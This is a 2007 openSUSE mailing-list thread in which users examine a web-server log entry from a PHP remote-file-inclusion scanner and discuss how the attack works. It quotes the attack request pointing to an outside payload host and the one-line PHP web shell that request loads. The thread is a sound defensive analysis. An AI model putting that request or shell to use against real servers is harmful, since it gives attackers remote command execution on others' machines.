On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.6 8.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP apps.
It looks like an indirect injection exploit--getting the hacker's code to run in the environment of the server to which it is sent. Is PHP really so trusting as to load and execute remote code in the manner suggested by this attack? Similar things are possible with database applications when the author naively uses string concatenation to combine template query fragments with user-supplied parameters.
M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?>
Looks like: a) Morfeus doesn't spell very well. b) Morfeus knows only Windows. c) Morfeus is kind of rude.
ciao, Marcus
Randall Schulz -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org